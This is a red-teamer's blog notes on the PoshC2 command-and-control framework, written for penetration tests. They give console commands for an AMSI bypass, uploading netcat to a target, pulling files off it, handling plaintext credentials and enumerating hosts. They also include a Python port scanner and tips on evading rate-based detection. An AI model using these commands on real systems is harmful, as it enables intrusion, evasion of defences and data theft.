Yaksas Security

Cyber Security Research

PoshC2: A Red Teamer’s Notes

Uday Mittal July 8, 2020

This is an ongoing post containing my notes on PoshC2 usage.

What is PoshC2?

PoshC2 is a command and control (C2) framework. It is used for post-exploitation tasks such as persistence, privilege escalation and lateral movement during penetration tests and red team exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.

All of PoshC2's functionality can be divided into five components:

PoshC2 Server – Serves the payloads that are executed on target machine(s) and call back to PoshC2. The server console also displays the output of commands executed on an implant. The server is written in Python.

Implants Receiver – Listens for incoming implant connections and aggregates them. It is also where modules are loaded and commands are issued to a single implant, a selection of implants, or all of them.

Payloads – Commands, shellcode and executable binaries that, when executed on target machine(s), establish a connection back to the Implants Receiver. Payloads are available in C#, Python, PowerShell, JavaScript and VBScript and support Windows, Linux (Python) and macOS (Python).

Implants – The PoshC2 agents running on target machine(s) that have connected back; each is identified in the console by an ImplantID.

Modules – Scripts (PowerShell and Python) and executable binaries (C#) for post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dumping and port forwarding. A comprehensive list of modules is available here.

How to use it?

The following video shows how to get PoshC2 up and running quickly. It covers:

  • Installation on Kali Linux 2020.2
  • Configuring PoshC2
  • Running the PoshC2 server and implants receiver
  • Managing implants
  • Modules
  • Loading C# and PowerShell modules on an Implant
  • Running commands on an implant

Read this to learn more about the lab environment used in this video.

Useful Commands (C# Implants)

Selecting Implant(s)

  • To select a single implant, enter the ImplantID
  • To select multiple implants, enter a comma separated list of ImplantIDs
  • To select all implants, enter ALL

Quick Reference List of Commands

Issue the following command once one or more implants are selected:

help

Bypass AMSI

bypass-amsi

Run this before loading PowerShell modules on a host where AMSI is active; otherwise scripts with known signatures (PowerView, for example) are likely to be blocked when they are loaded.

Upload files

upload-file <source file path> <destination file path>
Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe

Download files

download-file <file path>
Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'

This will save a copy of the target file in the PoshC2 project directory.

List Modules

To list the modules available for the selected implant type, select an implant and issue the following command:

listmodules

To list all modules, issue the same command at the implant selection prompt (with no implant selected):

listmodules

Load a C# Module

loadmodule <module name>
Example: loadmodule SharpView.exe

Load a PowerShell Module

pslo <module name>
Example: pslo powerview.ps1

You can also use loadmoduleforce, which forces the load even if the implant already reports the module as loaded.

Execute a PowerShell Command

sharpps <command>
Example: sharpps Get-ChildItem -Force -Recurse

Convert Username and Password to a PSCredentials object

sharpps [string]$userName = 'IND\user.ind02'
sharpps [string]$userPassword = 'Sup3rStr0ngP@ssw0rd'
sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)

After executing the above commands, $credObject can be passed to the -Credential parameter of any PowerShell cmdlet that accepts it. Note that the password travels over the C2 channel in plaintext as part of the command, so avoid doing this for credentials you do not want recorded in the command history.

Enumerate an Implant

ls-recurse <directory path>
Example: ls-recurse C:\Users
get-userinfo
get-computerinfo
loadmodule Seatbelt.exe
seatbelt all
sharpup

Port Scan

portscan <IP> <port> <delay-in-seconds> <max thread>
Example: portscan "192.168.3.8" "1-1000" 1 100
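To make the meaning of the four arguments concrete, here is a small threaded TCP connect scanner written for these notes with the same argument order as the console command above. It is an added example, not PoshC2's own code. Assumptions: the port argument accepts a single port, a comma list or a dash range (e.g. "22,80,1-1000"); the delay is a pause each worker takes before every connection attempt; max threads caps concurrency; a completed TCP handshake counts as open and anything else (refused, timeout) as closed.

```python
"""Threaded TCP connect scanner with PoshC2-style arguments.

Added example (not PoshC2 code). Argument order mirrors the console
command: portscan <IP> <port> <delay-in-seconds> <max thread>.
"""
import socket
import time
from concurrent.futures import ThreadPoolExecutor
from typing import List, Set


def parse_ports(spec: str) -> List[int]:
    """Expand a spec such as "22,80,1-1000" into a sorted, de-duplicated list."""
    ports: Set[int] = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            if lo > hi:  # tolerate "1000-1"
                lo, hi = hi, lo
            ports.update(range(lo, hi + 1))
        else:
            ports.add(int(part))
    bad = [p for p in ports if not 1 <= p <= 65535]
    if bad:
        raise ValueError(f"port(s) out of range: {bad}")
    return sorted(ports)


def probe(host: str, port: int, delay: float, timeout: float) -> bool:
    """One TCP connect attempt; True only if the handshake completes."""
    if delay > 0:
        time.sleep(delay)  # assumed semantics: pause before each attempt
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable, timed out
        return False


def portscan(host: str, port_spec: str, delay: float = 0.0,
             max_threads: int = 100, timeout: float = 1.0) -> List[int]:
    """Scan host for the ports in port_spec and return the open ones, sorted."""
    ports = parse_ports(port_spec)
    workers = max(1, min(max_threads, len(ports)))
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, delay, timeout), ports))
    return [p for p, is_open in zip(ports, results) if is_open]


if __name__ == "__main__":
    # Same shape as the console example: portscan "192.168.3.8" "1-1000" 1 100
    # Scanning loopback here so the script runs offline.
    print(portscan("127.0.0.1", "1-1000", 0, 100))
```

The delay argument is what keeps a scan from tripping rate-based detections: with 100 threads and a one second delay the scanner still fires roughly 100 connection attempts per second, so lower the thread count as well when the target network is monitored.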

Uday Mittal

Uday Mittal is a cybersecurity professional with extensive experience across industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM and CRISC, among others. He speaks on cybersecurity awareness and offensive security research, and has authored articles on cyber security and software development for a leading magazine on open source software.

Filed Under: CnC Tagged With: command and control, poshc2, post-exploitation, red team
